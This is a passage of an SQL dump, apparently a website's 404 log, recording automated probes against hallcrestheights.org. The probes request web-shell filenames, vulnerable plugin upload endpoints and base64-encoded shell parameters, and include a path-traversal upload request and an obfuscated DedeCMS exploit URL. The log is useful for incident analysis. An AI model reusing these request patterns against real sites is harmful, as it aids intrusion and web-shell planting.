22:06:46','0000-00-00 00:00:00'),(13323,'http://hallcrestheights.org/images/stories/0day.php?z3=b0I2a0FqLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:06:48','0000-00-00 00:00:00'),(13324,'http://hallcrestheights.org/install.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:06:51','0000-00-00 00:00:00'),(13325,'http://hallcrestheights.org/xmlsrpc.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:10:15','0000-00-00 00:00:00'),(13326,'http://hallcrestheights.org/wp-content/plugins/Analyser.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:12:12','0000-00-00 00:00:00'),(13327,'http://hallcrestheights.org/shootmei.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:12:17','0000-00-00 00:00:00'),(13328,'http://hallcrestheights.org/infos.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-12-30 22:12:46','0000-00-00 00:00:00'),(13329,'http://hallcrestheights.org/Abbrevsprl.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2017-12-30 22:18:47','0000-00-00 00:00:00'),(13330,'http://hallcrestheights.org/media/404.php?z3=b0I2a0FqLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:39:51','0000-00-00 00:00:00'),(13331,'http://hallcrestheights.org/authenticating.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:39:55','0000-00-00 00:00:00'),(13332,'http://hallcrestheights.org/show.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:38:38','0000-00-00 00:00:00'),(13333,'http://hallcrestheights.org/cache/news.php?z3=b0I2a0FqLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:40:02','0000-00-00 00:00:00'),(13334,'http://hallcrestheights.org/images/head.php?z3=b0I2a0FqLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:40:05','0000-00-00 00:00:00'),(13335,'http://hallcrestheights.org/wp-content/plugins/wp-lg3.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:40:10','0000-00-00 00:00:00'),(13336,'http://hallcrestheights.org/wp-content/plugins/wp-lg2.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:40:13','0000-00-00 00:00:00'),(13337,'http://hallcrestheights.org/files/files.php?z3=b0I2a0FqLnBocA==&z4=L2ZpbGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:42:53','0000-00-00 00:00:00'),(13338,'http://hallcrestheights.org/wp-content/plugins/caches.php?z3=b0I2a0FqLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:42:58','0000-00-00 00:00:00'),(13339,'http://hallcrestheights.org/cache/list.php?z3=b0I2a0FqLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:46:16','0000-00-00 00:00:00'),(13340,'http://hallcrestheights.org/images/laj.php?z3=b0I2a0FqLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2017-12-30 22:50:02','0000-00-00 00:00:00'),(13341,'http://hallcrestheights.org/log.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:53:10','0000-00-00 00:00:00'),(13342,'http://hallcrestheights.org/includes/u2p.php?z3=b0I2a0FqLnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:53:18','0000-00-00 00:00:00'),(13343,'http://hallcrestheights.org/cache/cache_aqbmkwwx.php?z3=b0I2a0FqLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:53:21','0000-00-00 00:00:00'),(13344,'http://hallcrestheights.org/dswat.org/wsdl.php?z3=b0I2a0FqLnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:53:24','0000-00-00 00:00:00'),(13345,'http://hallcrestheights.org/site/tmp/cTivrC.php?z3=b0I2a0FqLnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:53:26','0000-00-00 00:00:00'),(13346,'http://hallcrestheights.org/wp-main.php?z3=b0I2a0FqLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:52:44','0000-00-00 00:00:00'),(13347,'http://hallcrestheights.org/images/robots.txt.php?z3=b0I2a0FqLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:52:46','0000-00-00 00:00:00'),(13348,'http://hallcrestheights.org/cli/40dd1d.php?z3=b0I2a0FqLnBocA==&z4=L2NsaS8=',NULL,'hallcrestheights.org','',2,0,'2017-12-30 22:54:10','0000-00-00 00:00:00'),(13349,'http://hallcrestheights.org/wp-content/plugins/wpstorecart/php/upload.php',NULL,'','',3,0,'2017-12-31 20:22:15','0000-00-00 00:00:00'),(13350,'http://hallcrestheights.org/wp-content/plugins/uploader/uploadify/uploadify.php',NULL,'','',4,0,'2017-12-31 20:22:25','0000-00-00 00:00:00'),(13351,'http://hallcrestheights.org/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php',NULL,'','',2,0,'2017-12-31 20:22:25','0000-00-00 00:00:00'),(13352,'http://hallcrestheights.org/wp-content/plugins/wp-handy-lightbox/begin.php',NULL,'','',1,0,'2017-12-31 20:22:34','0000-00-00 00:00:00'),(13353,'http://hallcrestheights.org/wp-content/plugins/gallery-slider/register.php',NULL,'','',4,0,'2017-12-31 20:22:43','0000-00-00 00:00:00'),(13354,'http://hallcrestheights.org/wp-content/plugins/wp-symposium/server/php/index.php',NULL,'','',5,0,'2017-12-31 20:22:44','0000-00-00 00:00:00'),(13355,'http://hallcrestheights.org/wp-content/plugins/formcraft/file-upload/server/content/upload.php',NULL,'','',2,0,'2017-12-31 20:22:48','0000-00-00 00:00:00'),(13356,'http://hallcrestheights.org/wp-admin/post.php?task=wpdm_upload_files',NULL,'','',3,0,'2017-12-31 20:22:51','0000-00-00 00:00:00'),(13357,'http://hallcrestheights.org/wp-content/plugins/real3d-flipbook/includes/process.php',NULL,'','',2,0,'2017-12-31 20:22:57','0000-00-00 00:00:00'),(13358,'http://hallcrestheights.org//wp-content/plugins/contus-hd-flv-player/uploadVideo.php',NULL,'','',1,0,'2017-12-31 20:23:07','0000-00-00 00:00:00'),(13359,'http://hallcrestheights.org/wp-content/plugins/codecanyon-157782-video-gallery-wordpress-plugin-w-youtube-vimeo-/upload.php',NULL,'','',2,0,'2017-12-31 20:23:25','0000-00-00 00:00:00'),(13360,'http://hallcrestheights.org/wp-content/plugins/dzs-portfolio/upload.php',NULL,'','',2,0,'2017-12-31 20:23:30','0000-00-00 00:00:00'),(13361,'http://hallcrestheights.org/wp-content/plugins/cherry-plugin/admin/import-export/GLu67.php',NULL,'','',1,0,'2017-12-31 20:24:01','0000-00-00 00:00:00'),(13362,'http://hallcrestheights.org/wp-content/plugins/cardoza-facebook-like-box/custom-css/xo.php',NULL,'','',3,0,'2017-12-31 20:24:04','0000-00-00 00:00:00'),(13363,'http://hallcrestheights.org/wp-admin/plugin-editor.php?file=userpro/functions/_trial.php&plugin=userpro/index.php',NULL,'','',1,0,'2017-12-31 20:24:14','0000-00-00 00:00:00'),(13364,'http://hallcrestheights.org/wp-content/uploads/wysija/themes/ok/ok.php',NULL,'','',1,0,'2017-12-31 20:23:02','0000-00-00 00:00:00'),(13365,'http://hallcrestheights.org/components/com_jbcatalog/',NULL,'','',1,0,'2017-12-31 21:57:34','0000-00-00 00:00:00'),(13366,'http://hallcrestheights.org/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&id=138&Itemid=138&qqfile=/../../../RxR_1514826323.php',NULL,'','',1,0,'2018-01-01 17:04:11','0000-00-00 00:00:00'),(13367,'http://www.hallcrestheights.org//components/com_fabrik/fabrik.php',NULL,'','',1,0,'2018-01-01 17:14:13','0000-00-00 00:00:00'),(13368,'http://hallcrestheights.org/pdf/officeinves.pdf',NULL,'','',1,0,'2018-01-01 20:15:26','0000-00-00 00:00:00'),(13369,'http://hallcrestheights.org/pdf/earthquake_2014.pdf',NULL,'','',1,0,'2018-01-01 20:42:25','0000-00-00 00:00:00'),(13370,'http://hallcrestheights.org/pdf/green_9.pdf',NULL,'','',1,0,'2018-01-01 21:59:40','0000-00-00 00:00:00'),(13371,'http://hallcrestheights.org/pdf/jimutukue_takasa.pdf',NULL,'','',1,0,'2018-01-01 21:58:56','0000-00-00 00:00:00'),(13372,'http://www.hallcrestheights.org/components/com_fabrik/fabrik.php',NULL,'','',1,0,'2018-01-02 12:17:28','0000-00-00 00:00:00'),(13373,'http://hallcrestheights.org/discussiona/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-01-02 12:38:02','0000-00-00 00:00:00'),(13374,'http://hallcrestheights.org/_install/template/css/kkooycj.php',NULL,'http://site.ru','',1,0,'2018-01-02 14:54:44','0000-00-00 00:00:00'),(13375,'http://hallcrestheights.org/wp-includes/SimplePie/Content/Type/Mamha.php',NULL,'http://site.ru','',1,0,'2018-01-03 07:20:39','0000-00-00 00:00:00'),(13376,'http://hallcrestheights.org/updatecore/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-01-04 02:53:32','0000-00-00 00:00:00'),(13377,'http://hallcrestheights.org/images/create-cms-user.php',NULL,'http://site.ru','',4,0,'2018-01-04 08:00:03','0000-00-00 00:00:00'),(13378,'http://hallcrestheights.org/templates/ja_drimia_bk/index.php',NULL,'http://site.ru','',5,0,'2018-01-04 08:45:49','0000-00-00 00:00:00'),(13379,'http://hallcrestheights.org/templates/header_img.php',NULL,'http://site.ru','',1,0,'2018-01-04 09:05:28','0000-00-00 00:00:00'),(13380,'http://www.hallcrestheights.org//zabbix/index.php',NULL,'','',14,0,'2018-01-05 06:15:59','0000-00-00 00:00:00'),(13381,'http://hallcrestheights.org/tmp/inj.php',NULL,'http://site.ru','',1,0,'2018-01-05 06:59:35','0000-00-00 00:00:00'),(13382,'http://hallcrestheights.org/images/1ndex.php?z3=UFRqdURtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2018-01-05 21:10:35','0000-00-00 00:00:00'),(13383,'http://hallcrestheights.org/cache/cachee.php?z3=UFRqdURtLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:14:46','0000-00-00 00:00:00'),(13384,'http://hallcrestheights.org/maill.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-01-05 21:18:08','0000-00-00 00:00:00'),(13385,'http://hallcrestheights.org/wp-cache.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',1,0,'2018-01-05 21:16:49','0000-00-00 00:00:00'),(13386,'http://hallcrestheights.org/wp-content/plugins/Fbrrchive.php?z3=UFRqdURtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:21:49','0000-00-00 00:00:00'),(13387,'http://hallcrestheights.org/SessionController.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:23:15','0000-00-00 00:00:00'),(13388,'http://hallcrestheights.org/webconfig.txt.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:23:21','0000-00-00 00:00:00'),(13389,'http://hallcrestheights.org/robots.txt.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:26:01','0000-00-00 00:00:00'),(13390,'http://hallcrestheights.org/sql_dump.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:26:08','0000-00-00 00:00:00'),(13391,'http://hallcrestheights.org/jconfig.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:26:12','0000-00-00 00:00:00'),(13392,'http://hallcrestheights.org/thumb.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:26:17','0000-00-00 00:00:00'),(13393,'http://hallcrestheights.org/al277.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:29:17','0000-00-00 00:00:00'),(13394,'http://hallcrestheights.org/images/al277.php?z3=UFRqdURtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:29:25','0000-00-00 00:00:00'),(13395,'http://hallcrestheights.org/wsdl.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:29:30','0000-00-00 00:00:00'),(13396,'http://hallcrestheights.org/wp-data.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:29:35','0000-00-00 00:00:00'),(13397,'http://hallcrestheights.org/media/1ndex.php?z3=UFRqdURtLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:32:45','0000-00-00 00:00:00'),(13398,'http://hallcrestheights.org/media/tmp.php?z3=UFRqdURtLnBocA==&z4=L21lZGlhLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:32:50','0000-00-00 00:00:00'),(13399,'http://hallcrestheights.org/google-assist.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:32:14','0000-00-00 00:00:00'),(13400,'http://hallcrestheights.org/images/google-assist.php?z3=UFRqdURtLnBocA==&z4=L2ltYWdlcy8=',NULL,'hallcrestheights.org','',1,0,'2018-01-05 21:34:50','0000-00-00 00:00:00'),(13401,'http://hallcrestheights.org/elements.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:34:53','0000-00-00 00:00:00'),(13402,'http://hallcrestheights.org/cache/defau1t.php?z3=UFRqdURtLnBocA==&z4=L2NhY2hlLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:34:56','0000-00-00 00:00:00'),(13403,'http://hallcrestheights.org/roubt.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:35:00','0000-00-00 00:00:00'),(13404,'http://hallcrestheights.org/bookmark.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:33:42','0000-00-00 00:00:00'),(13405,'http://hallcrestheights.org/wp-content/plugins/myshe.php?z3=UFRqdURtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2018-01-05 21:36:54','0000-00-00 00:00:00'),(13406,'http://hallcrestheights.org/wp-content/plugins/sql_dump.php?z3=UFRqdURtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:38:54','0000-00-00 00:00:00'),(13407,'http://hallcrestheights.org/wp-content/uploads/Fbrrchive.php?z3=UFRqdURtLnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:45:57','0000-00-00 00:00:00'),(13408,'http://hallcrestheights.org/wp-content/plugins/wpfootes.php?z3=UFRqdURtLnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'hallcrestheights.org','',1,0,'2018-01-05 21:47:21','0000-00-00 00:00:00'),(13409,'http://hallcrestheights.org/modules/modules/modules.php?z3=UFRqdURtLnBocA==&z4=L21vZHVsZXMvbW9kdWxlcy8=',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:49:23','0000-00-00 00:00:00'),(13410,'http://hallcrestheights.org/wp-content/themes/fossy-speurhondenworst/divi-children-engine/divi_children_engine.php?z3=UFRqdURtLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL2Zvc3N5LXNwZXVyaG9uZGVud29yc3QvZGl2aS1jaGlsZHJlbi1lbmdpbmUv',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:49:27','0000-00-00 00:00:00'),(13411,'http://hallcrestheights.org/wp-content/themes/margreetalgra/404.php?z3=UFRqdURtLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL21hcmdyZWV0YWxncmEv',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:50:52','0000-00-00 00:00:00'),(13412,'http://hallcrestheights.org/wp-content/themes/twentyeleven-child/footer.php?z3=UFRqdURtLnBocA==&z4=L3dwLWNvbnRlbnQvdGhlbWVzL3R3ZW50eWVsZXZlbi1jaGlsZC8=',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:50:56','0000-00-00 00:00:00'),(13413,'http://hallcrestheights.org/images/stories/0day.php?z3=UFRqdURtLnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:56:50','0000-00-00 00:00:00'),(13414,'http://hallcrestheights.org/install.php?z3=UFRqdURtLnBocA==&z4=Lw==',NULL,'hallcrestheights.org','',2,0,'2018-01-05 21:57:24','0000-00-00 00:00:00'),(13415,'http://hallcrestheights.org/plugins/system/plg_system_anticopy/index.php',NULL,'http://site.ru','',2,0,'2018-01-06 08:43:22','0000-00-00 00:00:00'),(13416,'http://hallcrestheights.org/components/com_users/views/views.php',NULL,'http://site.ru','',2,0,'2018-01-06 09:30:25','0000-00-00 00:00:00'),(13417,'http://hallcrestheights.org/media/editors/codemirror/mode/d/update.php',NULL,'http://site.ru','',1,0,'2018-01-06 10:24:55','0000-00-00 00:00:00'),(13418,'http://hallcrestheights.org/CWyIog.php',NULL,'http://site.ru','',1,0,'2018-01-06 10:49:20','0000-00-00 00:00:00'),(13419,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/pagebreak/thumbs.php',NULL,'http://site.ru','',1,0,'2018-01-06 12:14:11','0000-00-00 00:00:00'),(13420,'http://hallcrestheights.org/components/com_weblinks/views/categories/tmpl/htaccess.php',NULL,'http://site.ru','',1,0,'2018-01-06 12:57:52','0000-00-00 00:00:00'),(13421,'http://hallcrestheights.org/modules/mod_simplefileuploadv1.3/elements/gino/k.php',NULL,'http://site.ru','',1,0,'2018-01-06 13:53:23','0000-00-00 00:00:00'),(13422,'http://hallcrestheights.org/images/content-wrapper.php',NULL,'http://site.ru','',2,0,'2018-01-06 16:26:56','0000-00-00 00:00:00'),(13423,'http://hallcrestheights.org/outpost.php',NULL,'http://site.ru','',4,0,'2018-01-06 16:41:00','0000-00-00 00:00:00'),(13424,'http://hallcrestheights.org/plugins/content/pagenavigation/tmpl/print.php',NULL,'http://site.ru','',2,0,'2018-01-06 17:13:37','0000-00-00 00:00:00'),(13425,'http://hallcrestheights.org/media/editors/tinymce/jscripts/tiny_mce/themes/advanced/skins/default/img/img.php',NULL,'http://site.ru','',1,0,'2018-01-06 17:50:13','0000-00-00 00:00:00'),(13426,'http://hallcrestheights.org/components/com_plugins/models/item.php',NULL,'http://site.ru','',1,0,'2018-01-06 18:44:45','0000-00-00 00:00:00'),(13427,'http://hallcrestheights.org/cache/wp-post.php',NULL,'http://site.ru','',2,0,'2018-01-06 18:59:23','0000-00-00 00:00:00'),(13428,'http://hallcrestheights.org/librareis.php',NULL,'http://site.ru','',2,0,'2018-01-06 19:37:32','0000-00-00 00:00:00'),(13429,'http://hallcrestheights.org/includes/database.cfg.php',NULL,'http://site.ru','',3,0,'2018-01-06 19:52:55','0000-00-00 00:00:00'),(13430,'http://hallcrestheights.org/libraries/vendor/simplepie/simplepie/idn/config.php',NULL,'http://site.ru','',2,0,'2018-01-06 20:38:13','0000-00-00 00:00:00'),(13431,'http://hallcrestheights.org/cli/run_cron.php',NULL,'http://site.ru','',1,0,'2018-01-06 20:43:28','0000-00-00 00:00:00'),(13432,'http://hallcrestheights.org/mod_config.php',NULL,'http://site.ru','',1,0,'2018-01-06 21:51:01','0000-00-00 00:00:00'),(13433,'http://hallcrestheights.org/components/com_content/views/category/tmpl/config.php',NULL,'http://site.ru','',1,0,'2018-01-06 21:52:49','0000-00-00 00:00:00'),(13434,'http://hallcrestheights.org/media/loader.php',NULL,'http://site.ru','',1,0,'2018-01-06 22:23:14','0000-00-00 00:00:00'),(13435,'http://hallcrestheights.org/modules/mod_articless/mod_xmljquery.php',NULL,'http://site.ru','',1,0,'2018-01-07 02:11:11','0000-00-00 00:00:00'),(13436,'http://hallcrestheights.org/components/com_content/models/content.php',NULL,'http://site.ru','',2,0,'2018-01-07 03:34:44','0000-00-00 00:00:00'),(13437,'http://hallcrestheights.org/libraries/joomla/client/http.php',NULL,'http://site.ru','',3,0,'2018-01-07 03:46:52','0000-00-00 00:00:00'),(13438,'http://hallcrestheights.org/libraries/library.php',NULL,'http://site.ru','',1,0,'2018-01-07 04:48:01','0000-00-00 00:00:00'),(13439,'http://www.hallcrestheights.org//components/com_b2jcontact/',NULL,'','',1,0,'2018-01-07 15:00:42','0000-00-00 00:00:00'),(13440,'http://hallcrestheights.org/components/com_fabrik/fabrik.php',NULL,'','',3,0,'2018-01-08 11:34:26','0000-00-00 00:00:00'),(13441,'http://hallcrestheights.org/libraries/joomla/database/encoding.php',NULL,'http://site.ru','',1,0,'2018-01-09 04:43:16','0000-00-00 00:00:00'),(13442,'http://hallcrestheights.org/media/system/js/cms.php',NULL,'http://site.ru','',2,0,'2018-01-09 07:59:29','0000-00-00 00:00:00'),(13443,'http://hallcrestheights.org/tmp/en-GB.php',NULL,'http://site.ru','',2,0,'2018-01-09 08:36:39','0000-00-00 00:00:00'),(13444,'http://hallcrestheights.org/ui-elements.php',NULL,'http://site.ru','',1,0,'2018-01-09 08:44:08','0000-00-00 00:00:00'),(13445,'http://hallcrestheights.org/modules/mod_login/mod_log.php',NULL,'http://site.ru','',2,0,'2018-01-09 10:00:47','0000-00-00 00:00:00'),(13446,'http://hallcrestheights.org/modules/mod_default/tmpl/template.php',NULL,'http://site.ru','',1,0,'2018-01-09 10:05:36','0000-00-00 00:00:00'),(13447,'http://hallcrestheights.org/plugins/content/defense.php',NULL,'http://site.ru','',2,0,'2018-01-09 10:47:12','0000-00-00 00:00:00'),(13448,'http://hallcrestheights.org/cache/cache.php',NULL,'http://site.ru','',2,0,'2018-01-09 10:51:07','0000-00-00 00:00:00'),(13449,'http://hallcrestheights.org/images/system.php',NULL,'http://site.ru','',2,0,'2018-01-09 11:30:51','0000-00-00 00:00:00'),(13450,'http://hallcrestheights.org/includes/widget.php',NULL,'http://site.ru','',1,0,'2018-01-09 12:56:17','0000-00-00 00:00:00'),(13451,'http://hallcrestheights.org/libraries/cms/redirecter.php',NULL,'http://site.ru','',1,0,'2018-01-09 15:53:12','0000-00-00 00:00:00'),(13452,'http://hallcrestheights.org/plugins/includes.php',NULL,'http://site.ru','',3,0,'2018-01-09 15:53:22','0000-00-00 00:00:00'),(13453,'http://hallcrestheights.org/plugins/content/simplepopup.php',NULL,'http://site.ru','',2,0,'2018-01-09 15:58:16','0000-00-00 00:00:00'),(13454,'http://hallcrestheights.org/libraries/joomla/application/cms.php',NULL,'http://site.ru','',1,0,'2018-01-09 16:34:29','0000-00-00 00:00:00'),(13455,'http://hallcrestheights.org/plugins/editors/pagenews.php',NULL,'http://site.ru','',1,0,'2018-01-09 17:16:38','0000-00-00 00:00:00'),(13456,'http://hallcrestheights.org/images/admin.php',NULL,'http://site.ru','',2,0,'2018-01-09 21:19:37','0000-00-00 00:00:00'),(13457,'http://hallcrestheights.org/modules/mod_helloworld/mod_helloworld.php',NULL,'http://site.ru','',2,0,'2018-01-09 21:57:44','0000-00-00 00:00:00'),(13458,'http://hallcrestheights.org/components/com_taskmanager/library/task.php',NULL,'http://site.ru','',2,0,'2018-01-09 22:32:30','0000-00-00 00:00:00'),(13459,'http://hallcrestheights.org/libraries/simplepie/idn/main.php',NULL,'http://site.ru','',1,0,'2018-01-09 23:12:22','0000-00-00 00:00:00'),(13460,'http://hallcrestheights.org/layouts/joomla/system/popup-pomo.php',NULL,'http://site.ru','',1,0,'2018-01-09 23:42:43','0000-00-00 00:00:00'),(13461,'http://hallcrestheights.org/components/com_source/tmpl/main.tpl.php',NULL,'http://site.ru','',2,0,'2018-01-10 00:59:52','0000-00-00 00:00:00'),(13462,'http://hallcrestheights.org/plugins/editors/tinymce/jscripts/tiny_mce/plugins/example/langs/langs/langs/langs.php',NULL,'http://site.ru','',2,0,'2018-01-10 01:12:06','0000-00-00 00:00:00'),(13463,'http://hallcrestheights.org/modules/mod_systemlogpatch/mod_systemlogpatch.php',NULL,'http://site.ru','',2,0,'2018-01-10 01:27:02','0000-00-00 00:00:00'),(13464,'http://hallcrestheights.org/modules/attributewizardpro/file_upload.php',NULL,'','',2,0,'2018-01-10 05:47:53','0000-00-00 00:00:00'),(13465,'http://hallcrestheights.org/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php',NULL,'','',4,0,'2018-01-10 05:49:22','0000-00-00 00:00:00'),(13466,'http://hallcrestheights.org/modules/simpleslideshow/uploadimage.php',NULL,'','',3,0,'2018-01-10 05:49:26','0000-00-00 00:00:00'),(13467,'http://hallcrestheights.org/wp-content/plugins/page-google-maps/pr.php',NULL,'','',2,0,'2018-01-10 05:49:30','0000-00-00 00:00:00'),(13468,'http://hallcrestheights.org//modules/columnadverts/uploadimage.php',NULL,'','',1,0,'2018-01-10 05:49:34','0000-00-00 00:00:00'),(13469,'http://hallcrestheights.org//components/com_sexycontactform/fileupload/index.php',NULL,'','',1,0,'2018-01-10 05:49:55','0000-00-00 00:00:00'),(13470,'http://hallcrestheights.org/wp-content/jssor-slider/jssor-uploads/ZUeQj.php',NULL,'','',1,0,'2018-01-10 05:50:11','0000-00-00 00:00:00'),(13471,'http://hallcrestheights.org/wp-content/plugins/showbiz/temp/update_extract/15WRQ.php',NULL,'','',1,0,'2018-01-10 05:50:28','0000-00-00 00:00:00'),(13472,'http://hallcrestheights.org/wp-content/themes/version.php',NULL,'','',2,0,'2018-01-10 05:50:36','0000-00-00 00:00:00'),(13473,'http://hallcrestheights.org/load-config.php',NULL,'http://site.ru','',2,0,'2018-01-10 08:55:30','0000-00-00 00:00:00'),(13474,'http://hallcrestheights.org/tmp/wso.php',NULL,'http://site.ru','',2,0,'2018-01-10 08:57:45','0000-00-00 00:00:00'),(13475,'http://www.hallcrestheights.org//plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=1',NULL,'','',1,0,'2018-01-10 10:44:42','0000-00-00 00:00:00'),(13476,'http://www.hallcrestheights.org//plus/mytag_js.php?aid=19015',NULL,'','',2,0,'2018-01-10 10:45:14','0000-00-00 00:00:00'),(13477,'http://www.hallcrestheights.org//plus/e7xue.php',NULL,'','',1,0,'2018-01-10 10:45:16','0000-00-00 00:00:00'),(13478,'http://hallcrestheights.org/media/editors/tinymce/skins/lightgray/img/strange.php',NULL,'http://site.ru','',1,0,'2018-01-10 11:22:28','0000-00-00 00:00:00'),(13479,'http://hallcrestheights.org/image.php',NULL,'http://site.ru','',4,0,'2018-01-10 11:44:24','0000-00-00 00:00:00'),(13480,'http://hallcrestheights.org/language/language.php',NULL,'http://site.ru','',3,0,'2018-01-10 11:46:47','0000-00-00 00:00:00'),(13481,'http://www.hallcrestheights.org/xmlrpc.php',NULL,'http://www.hallcrestheights.org/','',3,0,'2018-01-10 11:54:13','0000-00-00 00:00:00'),(13482,'http://www.hallcrestheights.org/bitrix/admin/',NULL,'http://www.hallcrestheights.org/','',1,0,'2018-01-10 11:54:19','0000-00-00 00:00:00'),(13483,'http://www.hallcrestheights.org/user/login',NULL,'http://www.hallcrestheights.org/','',1,0,'2018-01-10 11:54:22','0000-00-00 00:00:00'),(13484,'http://www.hallcrestheights.org/rss/order/new/',NULL,'http://www.hallcrestheights.org/','',1,0,'2018-01-10 11:54:25','0000-00-00 00:00:00'),(13485,'http://www.hallcrestheights.org/downloader/',NULL,'http://www.hallcrestheights.org/','',1,0,'2018-01-10 11:53:05','0000-00-00 00:00:00'),(13486,'http://www.hallcrestheights.org/index.php/admin/',NULL,'http://www.hallcrestheights.org/','',1,0,'2018-01-10 11:54:28','0000-00-00 00:00:00'),(13487,'http://www.hallcrestheights.org//blog/',NULL,'http://www.hallcrestheights.org/','',1,0,'2018-01-10 11:53:13','0000-00-00 